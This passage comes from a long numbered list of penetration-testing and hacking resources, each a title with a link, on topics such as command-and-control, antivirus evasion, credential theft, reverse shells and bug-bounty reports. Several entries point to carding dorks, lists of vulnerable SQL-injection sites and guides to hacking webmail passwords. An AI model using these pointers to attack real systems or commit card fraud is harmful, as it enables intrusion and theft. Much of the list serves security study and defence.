Miner.:\n\n\nhttps://medium.com/p/e370a900ab2e\n\n\n-602-cheat-sheet:\n\n\nhttp://pentestmonkey.net/category/cheat-sheet\n\n\n-603-Command and Control – Website Keyword:\n\n\nhttps://pentestlab.blog/2017/09/14/command-and-control-website-keyword/\n\n\n-604-Command and Control – Twitter:\n\n\nhttps://pentestlab.blog/2017/09/26/command-and-control-twitter/\n\n\n-605-Command and Control – Windows COM:\n\n\nhttps://pentestlab.blog/2017/09/01/command-and-control-windows-com/\n\n\n-606-Microsoft Office – NTLM Hashes via Frameset:\n\n\nhttps://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/\n\n\n-607-PHISHING AGAINST PROTECTED VIEW:\n\n\nhttps://enigma0x3.net/2017/07/13/phishing-against-protected-view/\n\n\n-608-PHISHING WITH EMPIRE:\n\n\nhttps://enigma0x3.net/2016/03/15/phishing-with-empire/\n\n\n-609-Reverse Engineering Android Applications:\n\n\nhttps://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/\n\n\n-610-HTML Injection:\n\n\nhttps://pentestlab.blog/2013/06/26/html-injection/\n\n\n-611-Meterpreter stage AV/IDS evasion with powershell:\n\n\nhttps://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/\n\n\n-612-Windows Atomic Tests by ATT&CK Tactic & Technique:\n\n\nhttps://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md\n\n\n-613-Windows Active Directory Post Exploitation Cheatsheet:\n\n\nhttps://medium.com/p/48c2bd70388\n\n\n-614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware:\n\n\nhttp://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml\n\n\n-615-How to Bypass Anti-Virus to Run Mimikatz:\n\n\nhttps://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/\n\n\n-616-Userland API Monitoring and Code Injection Detection:\n\n\nhttps://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565\n\n\n-617-USE TOR. 
USE EMPIRE.:\n\n\nhttp://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html\n\n-617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET:\n\n\nhttps://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/\n\n\n-618-Empire without PowerShell.exe:\n\n\nhttps://bneg.io/2017/07/26/empire-without-powershell-exe/\n\n\n-619-RED TEAM:\n\n\nhttps://bneg.io/category/red-team/\n\n\n-620-PDF Tools:\n\n\nhttps://blog.didierstevens.com/programs/pdf-tools/\n\n\n-621-DNS Data ex ltration — What is this and How to use?\n\n\nhttps://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822\n\n\n-621-Google Dorks:\n\n\nhttps://medium.com/p/7cfd432e0cf3\n\n\n-622-Hacking with JSP Shells:\n\n\nhttps://blog.netspi.com/hacking-with-jsp-shells/\n\n\n-623-Malware Analysis:\n\n\nhttps://github.com/RPISEC/Malware/raw/master/README.md\n\n\n-624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.:\n\n\nhttps://github.com/SandySekharan/CTF-tool\n\n\n-625-Group Policy Preferences:\n\n\nhttps://pentestlab.blog/2017/03/20/group-policy-preferences\n\n\n\n-627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES:\n\n\nhttps://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files\n\n\n-628-deobfuscation:\n\n\nhttps://furoner.wordpress.com/tag/deobfuscation/\n\n\n-629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE\nMACRO AND EVADING AVS:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/\n\n\n-630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/\n\n\n-631-GCAT – BACKDOOR EM PYTHON:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/\n\n\n-632-Latest Carding Dorks List for Sql njection 2019:\n\n\nhttps://latestechnews.com/carding-dorks/\n\n\n-633-google docs for credit 
card:\n\n\nhttps://latestechnews.com/tag/google-docs-for-credit-card/\n\n\n-634-How To Scan Multiple Organizations\nWith Shodan and Golang (OSINT):\n\n\nhttps://medium.com/p/d994ba6a9587\n\n-635-How to Evade Application\nWhitelisting Using REGSVR32:\n\n\nhttps://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/\n\n\n-636-phishing:\n\n\nhttps://www.blackhillsinfosec.com/tag/phishing/\n\n\n-637-Merlin in action: Intro to Merlin:\n\n\nhttps://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I\n\n\n-638-IP Cams from around the world:\n\n\nhttps://medium.com/p/a6f269f56805\n\n\n-639-Advanced Cross Site Scripting(XSS) Cheat Sheet by\nJaydeep Dabhi:\n\n\nhttps://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/\n\n\n-640-Just how easy it is to do a domain or\nsubdomain take over!?:\n\n\nhttps://medium.com/p/265d635b43d8\n\n\n-641-How to Create hidden user in Remote PC:\n\n\nhttp://www.hackingarticles.in/create-hidden-remote-metaspolit\n\n\n-642-Process Doppelgänging – a new way to impersonate a process:\n\n\nhttps://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/\n\n\n-643-How to turn a DLL into astandalone EXE:\n\n\nhttps://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/\n\n\n-644-Hijacking extensions handlers as a malware persistence method:\n\n\nhttps://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/\n\n\n-645-I'll Get Your Credentials ... 
Later!:\n\n\nhttps://www.fuzzysecurity.com/tutorials/18.html\n\n\n-646-Game Over: CanYouPwnMe > Kevgir-1:\n\n\nhttps://www.fuzzysecurity.com/tutorials/26.html\n\n\n-647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities:\n\n\nhttp://www.greyhathacker.net/?p=995\n\n\n-648-Getting started in Bug Bounty:\n\n\nhttps://medium.com/p/7052da28445a\n\n\n-649-Union SQLi Challenges (Zixem Write-up):\n\n\nhttps://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60\n\n\n-650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites:\n\n\nhttps://gbhackers.com/scanless-port-scans-websites-behalf\n\n\n-651-WEBAPP PENTEST:\n\n\nhttps://securityonline.info/category/penetration-testing/webapp-pentest/\n\n\n-652-Cross-Site Scripting (XSS) Payloads:\n\n\nhttps://securityonline.info/tag/cross-site-scripting-xss-payloads/\n\n\n-653-sg1: swiss army knife for data encryption, exfiltration & covert communication:\n\n\nhttps://securityonline.info/tag/sg1/\n\n\n-654-NETWORK PENTEST:\n\n\nhttps://securityonline.info/category/penetration-testing/network-pentest/\n\n\n-655-SQL injection in an UPDATE query - a bug bounty story!:\n\n\nhttps://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html\n\n\n-656-Cross-site Scripting:\n\n\nhttps://www.netsparker.com/blog/web-security/cross-site-scripting-xss/\n\n\n-657-Local File Inclusion:\n\n\nhttps://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/\n\n\n-658-Command Injection:\n\n\nhttps://www.netsparker.com/blog/web-security/command-injection-vulnerability/\n\n\n-659-a categorized list of Windows CMD commands:\n\n\nhttps://ss64.com/nt/commands.html\n\n\n-660-Understanding Guide for Nmap Timing Scan (Firewall Bypass):\n\n\nhttp://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass\n\n\n-661-RFID Hacking with The Proxmark 3:\n\n\nhttps://blog.kchung.co/tag/rfid/\n\n\n-662-A practical guide to 
RFID badge copying:\n\n\nhttps://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying\n\n\n-663-Denial of Service using Cookie Bombing:\n\n\nhttps://medium.com/p/55c2d0ef808c\n\n\n-664-Vultr Domain Hijacking:\n\n\nhttps://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking\n\n\n-665-Command and Control:\n\n\nhttps://vincentyiu.co.uk/red-team/domain-fronting\n\n\n-666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers:\n\n\nhttps://gbhackers.com/cisco-global-exploiter-cge\n\n\n-667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES:\n\n\nhttps://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files\n\n\n\n-668-Situational Awareness:\n\n\nhttps://pentestlab.blog/2018/05/28/situational-awareness/\n\n\n-669-Unquoted Service Path:\n\n\nhttps://pentestlab.blog/2017/03/09/unquoted-service-path\n\n\n-670-NFS:\n\n\nhttps://pentestacademy.wordpress.com/2017/09/20/nfs/\n\n\n-671-List of Tools for Pentest Rookies:\n\n\nhttps://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/\n\n\n-672-Common Windows Commands for Pentesters:\n\n\nhttps://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/\n\n\n-673-Open-Source Intelligence (OSINT) Reconnaissance:\n\n\nhttps://medium.com/p/75edd7f7dada\n\n\n-674-OSINT x UCCU Workshop on Open Source Intelligence:\n\n\nhttps://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence\n\n\n-675-Advanced Attack Techniques:\n\n\nhttps://www.cyberark.com/threat-research-category/advanced-attack-techniques/\n\n\n-676-Credential Theft:\n\n\nhttps://www.cyberark.com/threat-research-category/credential-theft/\n\n\n-678-The Cloud Shadow Admin Threat: 10 Permissions to Protect:\n\n\nhttps://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/\n\n\n-679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information 
Deficiently, Putting User Data at Risk:\n\n\nhttps://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/\n\n\n-680-Weakness Within: Kerberos Delegation:\n\n\nhttps://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/\n\n\n-681-Simple Domain Fronting PoC with GAE C2 server:\n\n\nhttps://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/\n\n\n-682-Find Critical Information about a Host using DMitry:\n\n\nhttps://www.thehackr.com/find-critical-information-host-using-dmitry/\n\n\n-683-How To Do OS Fingerprinting In Kali Using Xprobe2:\n\n\nhttp://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA\n\n\n-684-Crack SSH, FTP, Telnet Logins Using Hydra:\n\n\nhttps://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/\n\n\n-685-Reveal Saved Passwords in Browser using JavaScript Injection:\n\n\nhttps://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/\n\n\n-686-Nmap Cheat Sheet:\n\n\nhttps://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf\n\n\n-687-Manual Post Exploitation on Windows PC (Network Command):\n\n\n\nhttp://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command\n\n\n-688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool:\n\n\nhttp://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool\n\n\n-689-Hack Locked Workstation Password in Clear Text:\n\n\nhttp://www.hackingarticles.in/hack-locked-workstation-password-clear-text\n\n\n-690-How to Find ALL Excel, Office, PDF, and Images in Remote PC:\n\n\nhttp://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc\n\n\n-691-red-teaming:\n\n\nhttps://www.redteamsecure.com/category/red-teaming/\n\n\n-692-Create a Fake AP and Sniff Data 
mitmAP:\n\n\nhttp://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/\n\n\n-693-Bruteforcing From Nmap Output BruteSpray:\n\n\nhttp://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/\n\n\n-694-Reverse Engineering Framework radare2:\n\n\nhttp://www.uaeinfosec.com/reverse-engineering-framework-radare2/\n\n\n-695-Automated ettercap TCP/IP Hijacking Tool Morpheus:\n\n\nhttp://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/\n\n\n-696-List Of Vulnerable SQL Injection Sites:\n\n\nhttps://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199\n\n\n\n-697-Command and Control – Gmail:\n\n\nhttps://pentestlab.blog/2017/08/03/command-and-control-gmail/\n\n\n-698-Command and Control – DropBox:\n\n\nhttps://pentestlab.blog/2017/08/29/command-and-control-dropbox/\n\n\n-699-Skeleton Key:\n\n\nhttps://pentestlab.blog/2018/04/10/skeleton-key/\n\n\n-700-Secondary Logon Handle:\n\n\nhttps://pentestlab.blog/2017/04/07/secondary-logon-handle\n\n\n-701-Hot Potato:\n\n\nhttps://pentestlab.blog/2017/04/13/hot-potato\n\n\n-702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):\n\n\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\n\n\n-703-Linux-Kernel-exploits:\n\n\nhttp://tacxingxing.com/category/exploit/kernel-exploit/\n\n\n-704-Linux-Kernel-Exploit Stack Smashing:\n\n\nhttp://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/\n\n\n-705-Linux Kernel Exploit Environment:\n\n\nhttp://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/\n\n\n-706-Linux-Kernel-Exploit NULL dereference:\n\n\nhttp://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/\n\n\n-707-Apache mod_python for red teams:\n\nhttps://labs.nettitude.com/blog/apache-mod_python-for-red-teams/\n\n\n-708-Bounty Write-up (HTB):\n\n\nhttps://medium.com/p/9b01c934dfd2/\n\n\n709-CTF 
Writeups:\n\n\nhttps://medium.com/ctf-writeups\n\n\n-710-Detecting Malicious Microsoft Office Macro Documents:\n\n\nhttp://www.greyhathacker.net/?p=872\n\n\n\n-711-SQL injection in Drupal:\n\n\n\nhttps://hackerone.com/reports/31756\n\n\n-712-XSS and open redirect on Twitter:\n\n\nhttps://hackerone.com/reports/260744\n\n\n\n-713-Shopify login open redirect:\n\n\nhttps://hackerone.com/reports/55546\n\n\n-714-HackerOne interstitial redirect:\n\n\nhttps://hackerone.com/reports/111968\n\n\n-715-Ubiquiti sub-domain takeovers:\n\n\nhttps://hackerone.com/reports/181665\n\n\n-716-Scan.me pointing to Zendesk:\n\n\nhttps://hackerone.com/reports/114134\n\n\n-717-Starbucks' sub-domain takeover:\n\n\nhttps://hackerone.com/reports/325336\n\n\n-718-Vine's sub-domain takeover:\n\n\nhttps://hackerone.com/reports/32825\n\n\n-719-Uber's sub-domain takeover:\n\n\nhttps://hackerone.com/reports/175070\n\n\n\n-720-Read access to Google:\n\n\nhttps://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/\n\n\n-721-A Facebook XXE with Word:\n\n\nhttps://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/\n\n\n-722-The Wikiloc XXE:\n\n\nhttps://www.davidsopas.com/wikiloc-xxe-vulnerability/\n\n\n-723-Uber Jinja2 TTSI:\n\n\nhttps://hackerone.com/reports/125980\n\n\n-724-Uber Angular template injection:\n\n\nhttps://hackerone.com/reports/125027\n\n\n-725-Yahoo Mail stored XSS:\n\n\nhttps://klikki.fi/adv/yahoo2.html\n\n\n-726-Google image search XSS:\n\n\nhttps://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html\n\n\n-727-Shopify Giftcard Cart XSS :\n\n\nhttps://hackerone.com/reports/95089\n\n\n-728-Shopify wholesale XSS :\n\n\nhttps://hackerone.com/reports/106293\n\n\n-729-Bypassing the Shopify admin authentication:\n\n\nhttps://hackerone.com/reports/270981\n\n\n-730-Starbucks race conditions:\n\n\nhttps://sakurity.com/blog/2015/05/21/starbucks.html\n\n\n-731-Binary.com vulnerability – stealing a user's 
money:\n\n\nhttps://hackerone.com/reports/98247\n\n\n-732-HackerOne signal manipulation:\n\n\nhttps://hackerone.com/reports/106305\n\n\n-733-Shopify S buckets open:\n\n\nhttps://hackerone.com/reports/98819\n\n\n-734-HackerOne S buckets open:\n\n\nhttps://hackerone.com/reports/209223\n\n\n-735-Bypassing the GitLab 2F authentication:\n\n\nhttps://gitlab.com/gitlab-org/gitlab-ce/issues/14900\n\n\n-736-Yahoo PHP info disclosure:\n\n\nhttps://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/\n\n\n-737-Shopify for exporting installed users:\n\n\nhttps://hackerone.com/reports/96470\n\n\n-738-Shopify Twitter disconnect:\n\n\nhttps://hackerone.com/reports/111216\n\n\n-739-Badoo full account takeover:\n\n\nhttps://hackerone.com/reports/127703\n\n\n-740-Disabling PS Logging:\n\n\nhttps://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs\n\n\n-741-macro-less-code-exec-in-msword:\n\n\nhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n\n\n-742-5 ways to Exploiting PUT Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit\n\n\n-743-5 Ways to Exploit Verb Tempering Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability\n\n\n-744-5 Ways to Hack MySQL Login Password:\n\n\nhttp://www.hackingarticles.in/5-ways-to-hack-mysql-login-password\n\n\n-745-5 Ways to Hack SMB Login Password:\n\n\nhttp://www.hackingarticles.in/5-ways-to-hack-smb-login-password\n\n\n-746-6 Ways to Hack FTP Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-ftp-login-password\n\n\n-746-6 Ways to Hack SNMP Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-snmp-password\n\n\n-747-6 Ways to Hack VNC Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-vnc-login-password\n\n\n-748-Access Sticky keys Backdoor on Remote PC with Sticky Keys 
Hunter:\n\n\nhttp://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter\n\n\n-749-Beginner Guide to IPtables:\n\n\nhttp://www.hackingarticles.in/beginner-guide-iptables\n\n\n-750-Beginner Guide to impacket Tool kit:\n\n\nhttp://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit\n\n\n-751-Exploit Remote Windows 10 PC using Discover Tool:\n\n\nhttp://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool\n\n\n-752-Forensics Investigation of Remote PC (Part 2):\n\n\nhttp://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2\n\n\n-753-5 ways to File upload vulnerability Exploitation:\n\n\nhttp://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation\n\n\n-754-FTP Penetration Testing in Ubuntu (Port 21):\n\n\nhttp://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21\n\n\n-755-FTP Penetration Testing on Windows (Port 21):\n\n\nhttp://www.hackingarticles.in/ftp-penetration-testing-windows\n\n\n-756-FTP Pivoting through RDP:\n\n\nhttp://www.hackingarticles.in/ftp-pivoting-rdp\n\n\n-757-Fun with Metasploit Payloads:\n\n\nhttp://www.hackingarticles.in/fun-metasploit-payloads\n\n\n-758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC:\n\n\nhttp://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc\n\n\n-759-Generating Reverse Shell using Msfvenom (One Liner Payload):\n\n\nhttp://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload\n\n\n-760-Generating Scan Reports Using Nmap (Output Scan):\n\n\nhttp://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan\n\n\n-761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled):\n\n\nhttp://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled\n\n\n-762-Hack ALL Security Features in Remote Windows 7 
PC:\n\n\nhttp://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc\n\n\n-763-5 ways to Exploit LFi Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability\n\n\n-764-5 Ways to Directory Bruteforcing on Web Server:\n\n\nhttp://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server\n\n\n-765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit:\n\n\nhttp://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit\n\n\n-766-Hack Gmail and Facebook Password in Network using Bettercap:\n\n\nhttp://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap\n\n\n-767-ICMP Penetration Testing:\n\n\nhttp://www.hackingarticles.in/icmp-penetration-testing\n\n\n-768-Understanding Guide to Mimikatz:\n\n\nhttp://www.hackingarticles.in/understanding-guide-mimikatz\n\n\n-769-5 Ways to Create Dictionary for Bruteforcing:\n\nhttp://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing\n\n\n-770-Linux Privilege Escalation using LD_Preload:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/\n\n\n-771-2 Ways to Hack Remote Desktop Password using kali Linux:\n\n\nhttp://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux\n\n\n-772-2 ways to use Msfvenom Payload with Netcat:\n\n\nhttp://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat\n\n\n-773-4 ways to Connect Remote PC using SMB Port:\n\n\nhttp://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port\n\n\n-774-4 Ways to DNS Enumeration:\n\n\nhttp://www.hackingarticles.in/4-ways-dns-enumeration\n\n\n-775-4 Ways to get Linux Privilege Escalation:\n\n\nhttp://www.hackingarticles.in/4-ways-get-linux-privilege-escalation\n\n\n-776-101+ OSINT Resources for Investigators [2019]:\n\n\nhttps://i-sight.com/resources/101-osint-resources-for-investigators/\n\n\n-777-Week in OSINT 
#2019–02:\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f\n\n\n-778-OSINT Cheat Sheet:\n\n\nhttps://hack2interesting.com/osint-cheat-sheet/\n\n\n-779-OSINT Cheat Sheet:\n\n\nhttps://infoskirmish.com/osint-cheat-sheet/\n\n\n-780-OSINT Links for Investigators:\n\nhttps://i-sight.com/resources/osint-links-for-investigators/\n\n\n-781- Metasploit Cheat Sheet :\n\n\nhttps://www.kitploit.com/2019/02/metasploit-cheat-sheet.html\n\n\n-782- Exploit Development Cheat Sheet:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4\n\n\n-783-Building Profiles for a Social Engineering Attack:\n\n\nhttps://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/\n\n\n-784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes):\n\n\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\n\n\n-785-Getting the goods with CrackMapExec: Part 2:\n\n\nhttps://byt3bl33d3r.github.io/tag/crackmapexec.html\n\n\n-786-Bug Hunting Methodology (part-1):\n\n\nhttps://medium.com/p/91295b2d2066\n\n-787-Exploring Cobalt Strike's ExternalC2 framework:\n\n\nhttps://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/\n\n\n-788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities:\n\n\nhttps://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/\n\n\n-789-Adversarial Tactics, Techniques & Common Knowledge:\n\n\nhttps://attack.mitre.org/wiki/Main_Page\n\n\n-790-Bug Bounty — Tips / Tricks / JS (JavaScript Files):\n\n\nhttps://medium.com/p/bdde412ea49d\n\n\n-791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition):\n\n\nhttps://medium.com/p/f88a9f383fcc\n\n\n\n-792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory\nDatabase 
Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n-793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:\n\n\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n\n\n-794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution:\n\n\nhttps://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/\n\n\n-795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):\n\n\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\n\n\n-796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n-797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:\n\n\nhttps://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/\n\n\n-798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n\n-799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement:\n\n\nhttps://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/\n\n\n-800-Capcom Rootkit Proof-Of-Concept:\n\n\nhttps://www.fuzzysecurity.com/tutorials/28.html\n\n\n-801-Linux Privilege Escalation using Misconfigured 
NFS:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/\n\n\n-802-Beginners Guide for John the Ripper (Part 1):\n\n\nhttp://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/\n\n\n-803-Working of Traceroute using Wireshark:\n\n\nhttp://www.hackingarticles.in/working-of-traceroute-using-wireshark/\n\n\n-804-Multiple Ways to Get root through Writable File:\n\n\nhttp://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/\n\n\n-805-4 ways to SMTP Enumeration:\n\n\nhttp://www.hackingarticles.in/4-ways-smtp-enumeration\n\n\n-806-4 ways to Hack MS SQL Login Password:\n\n\nhttp://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password\n\n\n-807-4 Ways to Hack Telnet Passsword:\n\n\nhttp://www.hackingarticles.in/4-ways-to-hack-telnet-passsword\n\n\n-808-5 ways to Brute Force Attack on WordPress Website:\n\n\nhttp://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website\n\n\n-809-5 Ways to Crawl a Website:\n\n\nhttp://www.hackingarticles.in/5-ways-crawl-website\n\n\n-810-Local Linux Enumeration & Privilege Escalation Cheatsheet:\n\n\nhttps://www.rebootuser.com/?p=1623\n\n\n-811-The Drebin Dataset:\n\n\nhttps://www.sec.cs.tu-bs.de/~danarp/drebin/download.html\n\n\n-812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else:\n\n\nhttps://www.slideshare.net/x00mario/es6-en\n\n\n-813-IT and Information Security Cheat Sheets:\n\n\nhttps://zeltser.com/cheat-sheets/\n\n\n-814-Cheat Sheets - DFIR Training:\n\n\nhttps://www.dfir.training/cheat-sheets\n\n\n-815-WinDbg Malware Analysis Cheat Sheet:\n\n\nhttps://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/\n\n\n-819-Cheat Sheet for Analyzing Malicious Software:\n\n\nhttps://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/\n\n\n-820-Analyzing Malicious Documents Cheat Sheet - Prodefence:\n\n\nhttps://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/\n\n\n-821-Cheat 
